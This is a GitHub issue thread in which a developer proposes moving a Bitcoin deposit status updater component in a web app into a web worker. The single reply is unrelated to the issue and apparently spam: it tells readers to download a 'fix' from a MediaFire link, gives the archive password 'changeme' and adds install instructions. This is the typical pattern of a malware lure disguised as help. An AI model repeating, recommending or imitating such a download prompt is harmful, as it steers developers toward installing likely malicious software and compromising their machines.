### ISSUE TITLE
Migrate "BitcoinDepositsStatusUpdater" to web worker

### ISSUE THREAD

**Issue by gndelia** [hemilabs/ui-monorepo#487]
Similar to #486  - the [bitcoinDepositsStatusUpdater](https://github.com/hemilabs/ui-monorepo/blob/main/webapp/context/tunnelHistoryContext/bitcoinDepositsStatusUpdater.tsx) is a component that updates the status of bitcoin deposits in the background. This should run in a web worker, instead of running in a component as it does now

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
